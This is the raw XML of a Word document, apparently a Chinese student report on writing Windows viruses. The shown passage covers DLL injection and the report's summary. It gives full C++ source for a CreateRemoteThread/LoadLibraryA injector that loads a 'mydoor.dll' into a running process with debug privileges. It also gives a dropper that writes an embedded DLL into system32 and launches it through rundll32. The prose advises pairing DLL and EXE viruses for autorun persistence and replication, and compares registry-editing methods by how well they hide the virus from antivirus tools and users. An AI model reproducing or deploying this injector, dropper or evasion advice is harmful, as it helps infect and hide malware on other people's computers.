        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891590" w:rsidRPr="00F24550" w:rsidRDefault="00891590" w:rsidP="00891590">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRPr="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="00AC3196"/>
    <w:p w:rsidR="002B555A" w:rsidRDefault="002B555A" w:rsidP="004C3266">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>4 DLL</w:t>
      </w:r>
      <w:r>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="007A4663">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r>
        <w:t>随着病毒的发展,病毒也由破坏的目的转为利益的目的,因此隐蔽的DLL病毒逐渐发展起来.DLL是Dynamic Link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="007A4663">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r>
        <w:t>Library 的缩写,中文为动态链接库,它的实质并不是一个程序,而是由多个功能函数构成的.而DLL病毒是通过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="007A4663">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r>
        <w:t>特别的方法,让系统文件Rundll.exe \ Rundll32.exe等调用其的函数,而所调用的函数的代码就是病毒代码,或</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="007A4663">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r>
        <w:t>者通过线程插入技术插入到系统进程explorer.exe svchost.exe lsass.exe winlogon.exe 等或</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="007A4663">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r>
        <w:t>iexplorer.exe等常用软件进程中,达到隐蔽的目的.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>DLL病毒的编写(rundll32.exe调用法)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="007A4663">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="007A4663">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL注入源代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00892118" w:rsidRDefault="00892118" w:rsidP="00892118">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:sectPr w:rsidR="00892118" w:rsidSect="00693575">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>#include &lt;windows.h&gt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#include &lt;iostream.h&gt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#include &lt;tlhelp32.h&gt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#include &lt;stdio.h&gt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 xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>思路</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在目标进程中创建一个新的线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>向这个线程传递要注入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的地址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</w:p>
    <w:p w:rsidR="007A4663" w:rsidRPr="00351A52" w:rsidRDefault="007A4663" w:rsidP="00892118">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId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int EnableDebugPriv(const char *name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DWORD GetProcessId(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int main()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lastRenderedPageBreak/>
        <w:t>{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char myFile[MAX_PATH]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GetCurrentDirectory(MAX_PATH, myFile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strcat(myFile, "\\mydoor.dll"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InjectDll(myFile, GetProcessId()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return 0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}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BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)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{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HANDLE hRemoteProcess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 xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>设置权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以打开其他进程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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>EnableDebugPriv(SE_DEBUG_NAME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// OpenProcess(): Opens an existing local process object.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hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, false, dwRemoteProcessId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 xml:space="preserve">//VirtualAllocEx(): Reserves or commits a region of memory within the virtual address space of a specified process. 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//</w:t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The function initializes the memory it allocates to zero, unless MEM_RESET is used.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char *pszLibFileRemote = NULL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pszLibFileRemote = (char *)VirtualAllocEx(hRemoteProcess, NULL, lstrlen(DllFullPath)+1, MEM_COMMIT, PAGE_READWRITE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 xml:space="preserve">//WriteProcessMemory(): Writes data to an area of memory in a specified process. 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//</w:t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The entire area to be written to must be accessible or the operation fails.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 xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DllFullPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的内容写到这一打开的进程中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WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (void *)DllFullPath, lstrlen(DllFullPath)+1, NULL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PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA"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//CreateRemoteThread(): Creates a thread that runs in the virtual address space of another process.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 xml:space="preserve">// pfnStartAddr </w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指向的函数会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pszLibFileRemote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HANDLE hRemoteThread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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>if((hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0,  pfnStartAddr, pszLibFileRemote, 0, NULL)) == NULL)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{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cout&lt;&lt; "</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注入线程失败</w:t>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>!" &lt;&lt; endl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return false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}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CloseHandle(hRemoteProcess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CloseHandle(hRemoteThread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return true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}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int EnableDebugPriv(const char *name)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{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HANDLE hToken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TOKEN_PRIVILEGES tp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LUID luid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//OpenProcessToken(): opens the access token associated with a process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OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &amp;hToken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//LookupPrivilegeValue:()retrieves the locally unique identifier (LUID) used on a specified system to locally represent the specified privilege name.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LookupPrivilegeValue(NULL, name, &amp;luid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tp.PrivilegeCount = 1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tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>tp.Privileges[0].Luid = luid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AdjustTokenPrivileges(hToken, 0, &amp;tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL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return 0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}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DWORD GetProcessId()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{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DWORD Pid = -1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//CreateToolHelp32Snapshot(): Takes a snapshot of the specified processes, as well as the heaps, modules, and threads used by these processes.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HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0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PROCESSENTRY32 lPrs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ZeroMemory(&amp;lPrs, sizeof(lPrs)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lPrs.dwSize = sizeof(lPrs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char *targetFile = "calc.exe"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Process32First(hSnap, &amp;lPrs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if(strstr(targetFile, lPrs.szExeFile))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{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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>Pid = lPrs.th32ProcessID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return Pid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}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while(1)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{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ZeroMemory(&amp;lPrs, sizeof(lPrs)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lPrs.dwSize = sizeof(lPrs)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if(!Process32Next(hSnap, &amp;lPrs))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{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Pid = -1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break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}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if(strstr(targetFile, lPrs.szExeFile))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{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Pid = lPrs.th32ProcessID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break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  <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>}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}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ab/>
        <w:t>return Pid;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRPr="00351A52" w:rsidRDefault="007A4663" w:rsidP="00892118">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00351A52">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00892118" w:rsidRDefault="00892118" w:rsidP="007A4663">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:sectPr w:rsidR="00892118" w:rsidSect="00307F13">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="991" w:bottom="1440" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:num="2" w:sep="1" w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="007A4663">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>这个例子可以在explorer.exe运行前启动并再次自动写自动运行键值,前提是需要将该DLL文件写于</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c:\windows\system32\winsys.dll,这就可以交给exe主病毒来做了,这就是要说的DLL病毒与EXE病毒联合,这样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可以加强病毒的攻击力度,它由主病毒体*.exe来释放dll病毒辅助体*.dll,达到dll与exe联合的作用.一般</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>的,dll用来设置注册表的自启动,以及病毒的复制,而exe用来破坏.当然,也有少部分DLL病毒孤军奋战,由于十</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="007A4663" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>分隐蔽,也常常十分好用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="007A4663" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>释放病毒体示例</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0077195E">
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidR="0077195E">
        <w:t>释放上面的简单</w:t>
      </w:r>
      <w:r w:rsidR="0077195E">
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="0077195E">
        <w:t>病毒体的例子的</w:t>
      </w:r>
      <w:r w:rsidR="0077195E">
        <w:t>exe*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>#include&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned char DLL[15161] = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:t>此处代码过长</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>略</w:t>
      </w:r>
      <w:r>
        <w:t>... };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>int main(void)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     FILE *output;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     int i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     output=fopen("C:\\WINDOWS\\system32\\winsys.dll","wb");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     fwrite(DLL,sizeof(DLL),1,output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     fclose(output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     spawnl(1,"c:\\windows\\system32\\rundll32.exe"," C:\\WINDOWS\\system32\\winsys.dll start()",NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0077195E" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4663" w:rsidRDefault="0077195E" w:rsidP="0077195E">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B555A" w:rsidRDefault="002B555A" w:rsidP="002B555A"/>
    <w:p w:rsidR="002B555A" w:rsidRDefault="006F2FAA" w:rsidP="004C3266">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>四、</w:t>
      </w:r>
      <w:r w:rsidR="002B555A">
        <w:t>总结</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41D4A" w:rsidRPr="006E1BD0" w:rsidRDefault="00D41D4A" w:rsidP="00560F6F">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1BD0">
        <w:t>使用REG命令添加注册表可以达到直接调用系统命令（工具）来修改注册表的目的，如果被杀毒软件拦截也只会显示修改操作的发出来自 C:\WINDOWS\system32\reg.exe，使病毒不容易被寻找到。但由于REG命令属于控制台命令，因此调用时有黑色的控制台出现，是病 毒的征兆被感染用户发现，不利于病毒隐藏。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00D41D4A" w:rsidRPr="006E1BD0" w:rsidRDefault="00D41D4A" w:rsidP="00560F6F">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1BD0">
        <w:t>使用WindowsAPI添加注册表可以达到直接无须调用系统命令（工具）就可以修改注册表的目的，但如果被杀毒软件拦截会显示修改操 作来自的病毒体文件所在的路径，使病毒容易被寻找到。但由于WindowsAPI可以“悄悄”的完成修改，在前台没有任何显示，因此调用时如果未被拦截， 很难被感染用户发觉，利于病毒隐藏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B555A" w:rsidRDefault="00D41D4A" w:rsidP="00560F6F">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1BD0">
        <w:lastRenderedPageBreak/>
        <w:t>使用spawnl函数+REGEDIT可以兼得WindowsAPI和REG两种方法的优势，添加注册表如果被杀毒软件拦截会显示修改操作来自 c:\windows\regedit.exe，使病毒的路径难以被寻找到，利于病毒的隐藏。REGEDIT可以“悄悄”的完成修改，在前台没有任何显 示，因此调用时如果未被拦截，很难被感染用户发觉，利于病毒隐藏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B555A" w:rsidRDefault="006F2FAA" w:rsidP="004C3266">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五、</w:t>
      </w:r>
      <w:r w:rsidR="002B555A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要实践活动和参考文献</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00577558" w:rsidRPr="006F2FAA" w:rsidRDefault="00577558" w:rsidP="00577558"/>
    <w:p w:rsidR="00560F6F" w:rsidRDefault="00560F6F" w:rsidP="00560F6F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要实践活动：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1716E" w:rsidRDefault="00B1716E" w:rsidP="00B1716E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用Dev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C++和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Code::Blocks配合</w:t>
      </w:r>
      <w:r>
        <w:t>MinGW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器编写病毒程序，在虚拟机上运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1716E" w:rsidRDefault="00B1716E" w:rsidP="00560F6F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考文献：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1716E" w:rsidRDefault="00B1716E" w:rsidP="00B1716E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>[1] 段钢 编著 加密与解密（第二版） 电子工业出版社</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1716E" w:rsidRDefault="00B1716E" w:rsidP="00B1716E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>[2] 候俊杰 著 深入浅出MFC 第2 版 华中科技大学出版社</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1716E" w:rsidRDefault="00B1716E" w:rsidP="00B1716E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] SecurityFocus. </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://www.securityfocus.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B1716E" w:rsidRDefault="00B1716E" w:rsidP="00B1716E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] Internet Security Systems. 2002 November 18 (Revised). X-Force™ Vulnerability </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>Disclosure Guidelines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1716E" w:rsidRPr="00221F10" w:rsidRDefault="00B1716E" w:rsidP="00B1716E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>[5] 斯泽</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> 计算机病毒防范艺术 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> 机械工业出版社</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00577558" w:rsidRPr="00B1716E" w:rsidRDefault="00577558" w:rsidP="00577558"/>
    <w:p w:rsidR="002B555A" w:rsidRDefault="002B555A" w:rsidP="002B555A"/>
    <w:p w:rsidR="002B555A" w:rsidRDefault="002B555A" w:rsidP="002B555A"/>
    <w:p w:rsidR="0092589C" w:rsidRDefault="0092589C" w:rsidP="001774F7"/>
    <w:p w:rsidR="0092589C" w:rsidRDefault="0092589C" w:rsidP="001774F7"/>
    <w:p w:rsidR="0092589C" w:rsidRDefault="0092589C" w:rsidP="001774F7"/>
    <w:p w:rsidR="0092589C" w:rsidRDefault="0092589C" w:rsidP="001774F7"/>
    <w:sectPr w:rsidR="0092589C" w:rsidSect="00307F13">
      <w:type w:val="continuous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6E" w:rsidRDefault="00713D6E" w:rsidP="00E8218C">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00713D6E" w:rsidRDefault="00713D6E" w:rsidP="00E8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8C" w:rsidRDefault="00E8218C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8C" w:rsidRDefault="00E8218C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8C" w:rsidRDefault="00E8218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6E" w:rsidRDefault="00713D6E" w:rsidP="00E8218C">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00713D6E" w:rsidRDefault="00713D6E" w:rsidP="00E8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8C" w:rsidRDefault="00E8218C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8C" w:rsidRDefault="00E8218C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8C" w:rsidRDefault="00E821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6F40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75E0A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2F43BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50F8C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922F47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB38A5F2"/>
    <w:lvl w:ilvl="0" w:tplc="B07AC1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A3D57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F61AD8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5C"/>
    <w:rsid w:val="00007BA0"/>
    <w:rsid w:val="00064B7A"/>
    <w:rsid w:val="000F1BF7"/>
    <w:rsid w:val="001774F7"/>
    <w:rsid w:val="001D69DA"/>
    <w:rsid w:val="00203A6B"/>
    <w:rsid w:val="002B555A"/>
    <w:rsid w:val="002D5789"/>
    <w:rsid w:val="002E787A"/>
    <w:rsid w:val="002F50D0"/>
    <w:rsid w:val="002F68BB"/>
    <w:rsid w:val="00307F13"/>
    <w:rsid w:val="00312869"/>
    <w:rsid w:val="00401B20"/>
    <w:rsid w:val="004424FF"/>
    <w:rsid w:val="00472103"/>
    <w:rsid w:val="004C1766"/>
    <w:rsid w:val="004C3266"/>
    <w:rsid w:val="004D3A27"/>
    <w:rsid w:val="004D5CCA"/>
    <w:rsid w:val="004F52DF"/>
    <w:rsid w:val="004F5D44"/>
    <w:rsid w:val="00557D54"/>
    <w:rsid w:val="00560F6F"/>
    <w:rsid w:val="00577558"/>
    <w:rsid w:val="005D12AB"/>
    <w:rsid w:val="005D33C3"/>
    <w:rsid w:val="005E4981"/>
    <w:rsid w:val="006879C9"/>
    <w:rsid w:val="00693575"/>
    <w:rsid w:val="006D75BE"/>
